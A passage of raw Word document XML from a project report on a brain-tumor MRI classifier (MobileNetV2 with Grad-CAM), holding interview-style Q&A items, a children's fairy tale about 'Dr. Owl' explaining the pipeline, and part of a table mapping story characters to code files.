      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to 3D CNN architectures (e.g. 3D ResNet, UNet, or Vision Transformers like Swin UNETR) operating on $(H </w:t>
        <w:tab/>
        <w:t xml:space="preserve">imes W </w:t>
        <w:tab/>
        <w:t>imes D)$ voxel arrays with 3D convolutions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>39. What is the clinical risk of a False Negative in our system?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A patient with an early-stage glioma would be told their brain is healthy (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>notumor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), delaying craniotomy or chemotherapy until the tumor causes irreversible neurological damage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>40. Why did meningioma recall improve by 15% when retraining on the full dataset?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Adding the 1,120 held-out validation images exposed the classification head to wider variances in skull convexity and dural-tail borders, teaching it not to confuse meningiomas with pituitary lesions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>41. How would you deploy this model to edge devices (e.g., portable field MRI scanners)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Quantize the model using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>TensorFlow Lite (TFLite)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to 8-bit integers (INT8 post-training quantization), reducing model size to ~3 MB and latency to under 10 ms on embedded ARM processors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>42. Is this system ready for autonomous clinical diagnosis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>No.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deep learning models are diagnostic second-opinion aids. It is not FDA-approved and all outputs must be corroborated by a board-certified neuroradiologist.</w:t>
      </w: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15: Explain the Project to a Five-Year-Old</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>15.1 The Story of Dr. Owl's Magic Brain Scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Once upon a time, deep in the Whispering Woods, there was a wonderful animal hospital run by a very wise doctor named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Dr. Owl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Animals came from all over the forest when they had a headache. Dr. Owl had a special machine that took a photograph of the inside of an animal's head. The photograph showed the animal's brain, like a map of a magical kingdom!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Trouble in the Kingdom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Most of the time, the brain kingdom was happy and healthy, with clear rivers and peaceful paths.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xml:space="preserve">       [ A Healthy Brain Kingdom ]          [ An Unwanted Mud Monster Hiding! ]</w:t>
              <w:br/>
              <w:t xml:space="preserve">             .----------------.                       .----------------.</w:t>
              <w:br/>
              <w:t xml:space="preserve">            /   (^_^)  (^_^)   \                     /   (^_^)   ###               |   Peaceful brain   |                   |  Brain    #####   |  &lt;-- "Tumor!"</w:t>
              <w:br/>
              <w:t xml:space="preserve">           |    kingdom with    |                   |  kingdom  #####   |</w:t>
              <w:br/>
              <w:t xml:space="preserve">            \   clear paths    /                     \         (^_^)   /</w:t>
              <w:br/>
              <w:t xml:space="preserve">             '----------------'                       '----------------'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">But sometimes, an unwanted guest called a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Mud Monster (a Tumor)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> would sneak into the kingdom:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Some mud monsters liked to hide inside the squishy brain soil—these were called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Gliomas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Other mud monsters clung to the kingdom's outer protective brick walls—these were called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Meningiomas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">And tiny little monsters liked to hide in the deep royal basement under the castle—these were called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pituitary Monsters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Because the photograph was only black, white, and gray, even the cleverest woodland doctors had trouble finding the sneaky mud monsters!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="334155"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Dr. Owl's Super-Team of Helpers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>To help the sick animals, Dr. Owl built a super-team of magical assistants inside his treehouse:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. Pippin the Measuring Assistant</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Whenever a rabbit brought in an MRI photograph, it came in all sorts of crazy sizes—some as big as a dinner plate, others tiny like a postage stamp! Pippin used a golden ruler to gently trim every photo so it was exactly $224 </w:t>
        <w:tab/>
        <w:t>imes 224$ magic centimeters, and painted the colors so Dr. Owl's lenses could see it perfectly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. Sherlock the Owl's Multi-Lens Glasses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, Dr. Owl slipped on his famous </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Detective Glasses (MobileNetV2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>. These glasses had 53 special magnifying lenses stacked in a row:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The first lens looked for simple straight sticks and round edges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The middle lenses looked for tissue textures and curves.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The deepest lens looked for suspicious cloudy shapes where mud monsters hide!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. Barnaby the Scorekeeper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Standing next to Dr. Owl was Barnaby, holding four big chalkboard buckets labeled:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Glioma</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Meningioma</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Pituitary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Healthy Brain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Dr. Owl whispered what he saw through his lenses, and Barnaby dropped 100 golden marbles across the four buckets. If Barnaby dropped 95 marbles into the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Meningioma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> bucket and only 5 in the others, he rang a bell: *"It's a Meningioma with 95% certainty!"*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. Sparky the Magic Paintbrush</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*"Wait!"* cried the baby squirrel. *"How do we know you're not just guessing?"*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This was Dr. Owl's favorite moment. He pulled out </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Sparky, the Magic Glowing Paintbrush (Grad-CAM)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Sparky flew backward through the 53 lenses of Dr. Owl's glasses to see which exact lens shouted the loudest when looking at the monster.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Sparky dipped his bristles in bright fiery red and neon yellow paint, flying right onto the black-and-white photograph!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Swoosh!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A glowing red circle lit up right over the mud monster's head!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The baby squirrel gasped: *"Look! The magic paint is glowing right on the wall where the muddy bump is!"*</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Thanks to Dr. Owl, Pippin, Sherlock's glasses, Barnaby, and Sparky's magic paintbrush, the surgeon doctors knew exactly where to gently remove the mud monster, and the little woodland animals went home happy, healthy, and cured!</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15.2 Mapping the Story to Our Actual Python Code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20" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Story Character</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Role in the Fairy Tale</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Real Component in Our Codebase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>File Location</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**The Hospital Treehouse**</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Where all the animals meet and see the magic screen.</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**Streamlit Web Application UI**</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`app.py`</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**The Patient's Photo**</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The black-and-white map of the brain kingdom.</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**Uploaded MRI Scan Image**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`app.py` (`st.file_uploader`)</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**Pippin the Measuring Assistant**</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 xml:space="preserve">Trims every photo to $224 </w:t>
              <w:tab/>
              <w:t>imes 224$ and standardizes colors.</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**Image Preprocessing Pipeline**</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`app.py` (`cv2.resize`, `preprocess_input`)</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**Sherlock's 53 Glasses**</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Multi-lens glasses that recognize edges, contours, and lesions.</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**MobileNetV2 Convolutional Base**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`app.py` (`mobilenetv2_1.00_224`)</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**The 53rd Deepest Lens**</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The final lens where semantic monster patterns are clearest.</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 xml:space="preserve">**`out_relu` Conv Layer** (Shape: $7 </w:t>
              <w:tab/>
              <w:t xml:space="preserve">imes 7 </w:t>
              <w:tab/>
              <w:t>imes 1280$)</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`base_model.output`</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**Barnaby the Scorekeeper**</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Drops 100 golden marbles across 4 buckets.</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**Dense(4) Classification Head &amp; Softmax**</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`output_predictions` layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>**Sparky the Magic Paintbrush**</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Traces backward through lenses to paint a glowing red circle.</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**Grad-CAM Engine (`tf.GradientTape`)**</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>`compute_gradcam()` in `app.py`</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1E293B"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>**The Glowing Red Highlight**</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The warm overlay showing the exact tumor site.</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**Superimposed Jet Colormap Overlay**</w:t>
